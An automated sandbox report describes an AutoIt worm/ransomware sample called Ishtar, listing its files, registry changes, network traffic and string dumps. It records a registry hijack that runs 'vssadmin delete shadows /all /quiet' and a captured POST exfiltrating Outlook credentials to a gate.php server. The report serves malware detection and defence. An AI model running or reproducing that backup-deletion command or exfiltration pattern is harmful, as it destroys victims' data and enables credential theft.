Worm.Win32.AutoItGen_aacc754ec9

by malwarelabrobot on March 26th, 2018 in Malware Descriptions.

Trojan.RansomKD.12614230 (BitDefender), HEUR:Trojan.Script.Generic (Kaspersky), Trojan.Encoder.7240 (DrWeb), Trojan-Ransom.Ishtar (A) (Emsisoft), Trojan.Gen (Symantec), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Ransom, Trojan, Worm, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: aacc754ec9d2c845825c2e1a1518cbe5
SHA1: c837085e2303b8f72bb1bd93fd48d47c1afe6e94
SHA256: 61cb4b4b36ac067ddeb17fe30e8ee7ed4cfa54c82bb6119409a79f2a56656203
SSDeep: 49152:Zw80cTsjkWaFLEkAVhpGxXgVJVXTvBZA1Vs:28sjkepzVJ/4s
Size: 2170293 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-12-05 23:29:40
Analyzed on: Windows7 SP1 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

No specific payload has been found.

Process activity

The Worm creates the following process(es):

%original file name%.exe:1828
eventvwr.exe:3976
Kb8K11.exe:2916
Kb8K11.exe:1812
Kb8K11.exe:2992
Kb8K11.exe:2980
Kb8K11.exe:1008

The Worm injects its code into the following process(es):

Kb8K11.exe:3060

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1828 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\Desktop\aacc754ec9d2c845825c2e1a1518cbe5.docx (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe (15424 bytes)

The process Kb8K11.exe:2916 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.tmp (1 bytes)

The process Kb8K11.exe:2992 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\~pE6D0A8772EB1.tmp (221 bytes)

The process Kb8K11.exe:2980 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (280 bytes)

The process Kb8K11.exe:3060 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\ProgramData\VMware\VMware Tools\manifest.txt (345 bytes)
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg (2631 bytes)
C:\totalcmd\SIZE!.TXT (1419 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\README-ISHTAR.txt (1 bytes)
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg (2152 bytes)
C:\totalcmd\HISTORY.TXT (1613 bytes)
C:\totalcmd\DEFAULT.BAR (2187 bytes)
C:\ISHTAR.DATA (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ISHTAR.DATA (143 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\googledesktop.txt (1227 bytes)
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg (1398 bytes)
C:\totalcmd\KEYBOARD.TXT (852 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\win7gadgets.txt (1035 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\vistasidebar.txt (2059 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\microsoftoffice2003.txt (1163 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt (714 bytes)
C:\totalcmd\NO.BAR (299 bytes)
C:\Users\"%CurrentUserName%"\Desktop\aacc754ec9d2c845825c2e1a1518cbe5.docx (566 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt (435 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\vmwarefilters.txt (26 bytes)
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg (2252 bytes)
C:\README-ISHTAR.txt (1 bytes)
C:\totalcmd\REGISTER.RTF (200 bytes)
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg (2389 bytes)
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv (5351 bytes)
C:\Users\"%CurrentUserName%"\Documents\Outlook Files\mar.kus@bigmir.net.pst (608 bytes)
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg (1474 bytes)
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg (2391 bytes)
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg (2128 bytes)
C:\Users\"%CurrentUserName%"\Desktop\README-ISHTAR.txt (1 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\visualstudio2005.txt (523 bytes)
C:\Users\"%CurrentUserName%"\Desktop\ISHTAR.DATA (1 bytes)

The Worm deletes the following file(s):

C:\ISHTAR.DATA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\~pE6D0A8772EB1.tmp (0 bytes)

The process Kb8K11.exe:1008 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (280 bytes)

Registry activity

The process %original file name%.exe:1828 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Ishtr 1.0]
"Start" = "Success"

[HKCU\Software\Classes\Local Settings\MuiCache\66\52C64B7E]
"LanguageList" = "en-US, en"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe"

The process eventvwr.exe:3976 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Worm deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Kb8K11.exe:3060 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Ishtr 1.0]
"Eop" = "Success"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\mscfile\shell\open\command]
"(Default)" = "C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 580910 581120 4.62736 c2c2260508750422d20cd5cbb116b146
.rdata 585728 188686 188928 3.99304 4513b58651e3d8d87c81a396e5b2f1d1
.data 778240 36724 20992 0.830952 c2de4a3d214eae7e87c7bfc06bd79775
.rsrc 815104 165032 165376 5.29919 b0b5946572fef8162766391fbf570b57
.reloc 983040 28976 29184 4.70119 1254908a9a03d2bcf12045d49cd572b9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
f3ab5ab78854b664a9e050673e1f4fcf

URLs

URL IP
hxxp://bit.ly/2fmwcur 67.199.248.10
hxxp://46.45.138.138/pw/gate.php
www.google.ru 216.58.215.99
www.google.com 216.58.215.100


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
ET TROJAN Trojan Generic - POST To gate.php with no referer

Traffic

POST /pw/gate.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 46.45.138.138
Content-Length: 309
Connection: Keep-Alive
Cache-Control: no-cache

DATA:Local Admin,Windows 7 Ultimate,WIN-UK0FFOO83I6
Mark,MS Outlook 2002/2003/2007/2010,mar.kus@bigmir.net,pop.bigmir.net,,No,POP3,mar.kus@bigmir.net,gfhjkm123!,Outlook,Strong,smtp.bigmir.net,

URL,Web Browser,User Name,Password,Password Strength,User Name Field,Password Field,Created Time,Modified Time

HTTP/1.1 404 Not Found
Date: Sun, 25 Mar 2018 01:12:51 GMT
Server: sopws
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Accept-Ranges: bytes
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=1000
Transfer-Encoding: chunked
Content-Type: text/html
1.....1.....1.....157..<!DOCTYPE html>.<html>.    <head
>.    <meta http-equiv="Content-type" content="text/html; charse
t=utf-8">.    <meta http-equiv="Cache-control" content="no-cache
">.    <meta http-equiv="Pragma" content="no-cache">.    <
meta http-equiv="Expires" content="0">.    <meta name="viewport"
 content="width=device-width, initial-scale=1.0">.    <title>
..3..404..1.. ..9..Not Found..1fca..</title>.    <style type=
"text/css">.        body {.            font-family: Arial, Helvetic
a, sans-serif;.            font-size: 14px;.            line-height: 1
.428571429;.            background-color: #ffffff;.            color: 
#2F3230;.            padding: 0;.            margin: 0;.        }.    
    section, footer {.            display: block;.            padding:
 0;.            margin: 0;.        }.        .container {.            
margin-left: auto;.            margin-right: auto;.            padding
: 0 10px;.        }.        .response-info {.            color: #CCCCC
C;.        }.        .status-code {.            font-size: 500%;.     
   }.        .status-reason {.            font-size: 250%;.           
 display: block;.        }.        .contact-info,.        .reason-text
 {.            color: #000000;.        }.        .additional-info {.  
          background-repeat: no-repeat;.            background-color: 
#293A4A;.            color: #FFFFFF;.        }.        .additional-inf
o a {.            color: #FFFFFF;.        }.        .additional-in
<<< skipped >>>


GET /2fmwcur HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bit.ly


HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 25 Mar 2018 01:11:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 109
Connection: keep-alive
Cache-Control: private, max-age=90
Location: hXXps://VVV.google.ru/
Set-Cookie: _bit=i2p1bX-1eca6060fd861e8dc3-00T; Domain=bit.ly; Expires=Fri, 21 Sep 2018 01:11:59 GMT
<html>.<head><title>Bitly</title></head>
.<body><a href="hXXps://VVV.google.ru/">moved here</a&g
t;</body>.</html>HTTP/1.1 301 Moved Permanently..Server: n
ginx..Date: Sun, 25 Mar 2018 01:11:59 GMT..Content-Type: text/html; ch
arset=utf-8..Content-Length: 109..Connection: keep-alive..Cache-Contro
l: private, max-age=90..Location: hXXps://VVV.google.ru/..Set-Cookie: 
_bit=i2p1bX-1eca6060fd861e8dc3-00T; Domain=bit.ly; Expires=Fri, 21 Sep
 2018 01:11:59 GMT..<html>.<head><title>Bitly</ti
tle></head>.<body><a href="hXXps://VVV.google.ru/"&g
t;moved here</a></body>.</html>..

The Worm connects to the servers at the folowing location(s):

SearchProtocolHost.exe_776:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_4040:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
.REGISTRY
Windows Search Service
tquery.dll
.iu-CA-Latn
.sr-BA-Cyrl
.bs-BA-Latn
.zh-CHS
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

Kb8K11.exe_3060:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
r%f;M
j.Xf;
j.Zf;
PSSSSSSh
Gt.Ht$
@Ew.AEw
Bv.TBv
Bv.SCv
kernel32.dll
?#%X.y
GetProcessWindowStation
operator
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
WSOCK32.dll
VERSION.dll
WINMM.dll
COMCTL32.dll
MPR.dll
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
USERENV.dll
UxTheme.dll
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
KERNEL32.dll
OpenWindowStationW
SetProcessWindowStation
CloseWindowStation
MapVirtualKeyW
EnumChildWindows
EnumWindows
VkKeyScanW
GetKeyState
GetKeyboardState
SetKeyboardState
GetAsyncKeyState
keybd_event
EnumThreadWindows
ExitWindowsEx
UnregisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
zcÁ
n..GGHHH
n...GGHHH
n ....HGHHHH
n  ....G.HHH
~~~~{~{{{{
n!! ....HGHHHH
n!!  .....HHHHHH
!!!  ....GGHHH
!!"".....HHHHnv
"""...-.nv
.bvT@
bW"F.Bu
Iq%uY
:.gIT
LK6.aD
4Y%f;
5>.ohh
;Tñ<
RJ.aF
.MejE
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
;$;*;0;6;<;|;
=#=(=-=2=7===
3.44484<4@4
3&323^3|3
9 9$9(9,9?9
?#?'? ?/?3?7?;???
4"4&4*4.424
7)868=8=:
= =$=(=,=0=4=8=
0 0$0(0,00040
3"3(313]3
1!1%1)1-1115191=1
< <*<4<{<
<$=4=8=<=
3 3(30383@3
/AutoIt3ExecuteScript
/AutoIt3ExecuteLine
CMDLINE
CMDLINERAW
>>>AUTOIT NO CMDEXECUTE<<<
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MAPKEYS
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDownDelay
SendKeyDelay
TCPTimeout
mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
789:;<=>?
APPSKEY
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
KEYS
\\?\UNC\
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 14, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

vssvc.exe_2220:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
USER32.dll
msvcrt.dll
ATL.DLL
ole32.dll
SHLWAPI.dll
OLEAUT32.dll
RPCRT4.dll
VSSAPI.DLL
NETAPI32.dll
NETUTILS.DLL
SRVCLI.DLL
SAMCLI.DLL
CLUSAPI.dll
XOLEHLP.dll
RESUTILS.dll
SETUPAPI.dll
cfgmgr32.DLL
VssTrace.DLL
AUTHZ.dll
VirtDisk.dll
FEwtHEwDCEw;AEw.AEw
- Code: %8lslu- Call: %8lslu- PID: lu- TID: lu- CMD: %-*ls- User: %-*ls
Component.pwszPath
Component.pwszCaption
Component.pwszComponentName
::StringCchPrintf( ARRAY_COUNT_PARAM(wszDescriptionDiskNumber), L"%d", pCurDisk->DeviceNumber )
::StringCchPrintf( ARRAY_COUNT_PARAM(wszComponentName), L"harddisk%d", pCurDisk->DeviceNumber )
ppwszErrorMsg
Msg.FormatErrorCode( hrError, ppwszErrorMsg )
m_pPackList[ulPackIndex].GetPackId(&guidPackId)
asr_ldm.InitializeForBackup( &asr_sys, *ppmwszSelectedCriticalVolumes, rgIncludedDisks, cIncludedDisks )
VSS_E_ASRERROR_DYNAMIC_VHD_NOT_SUPPORTED
pAsrSys->IsCriticalDisk( pDynDiskList[ulDiskIndex].GetDeviceNumber(), &fIsCritical )
ERROR_UNSUPPORTED_TYPE
ERROR_NOT_SUPPORTED
::StringCchCopyN( pwszVolume, cchVolume, pSysInfo->SystemPartition.Buffer, (pSysInfo->SystemPartition.Length)/sizeof(WCHAR) )
StringCchPrintf( pwszVolume, cchVolume, L"\\\\?\\GLOBALROOT%s", wszDevicePath )
GetFileSytemType( wszFsName, &pPartitionTable[dwIndex].FileSystemType )
::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\?\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )
::StringCchPrintf(ARRAY_COUNT_PARAM(wszDeviceNumber), L"%d", pStorageDeviceNumber->DeviceNumber)
::StringCchPrintf(ARRAY_COUNT_PARAM(wszErrorCodeString), L"0x%x", dwError)
YAsrpIsSupportedConfiguration(m_pDiskListHead, &m_SystemInfo)
SafeStrConvertGuidString(&pPartitionInfo->Gpt.PartitionId, ARRAY_COUNT_PARAM(wszGuidString))
SafeStrConvertGuidString(&pDriveLayoutEx->Gpt.DiskId, ARRAY_COUNT_PARAM(wszGuidString))
::StringCchPrintf(pwszSignature, cchSignature, L"0x%x", pDriveLayout->Mbr.Signature)
::StringCchCopy( pwszDevicePath, cchDevicePath, pBcdeDevice->Partition.Path )
::BcdOpenObject(hStore, &GUID_WINDOWS_BOOTMGR, &hBootMgr)
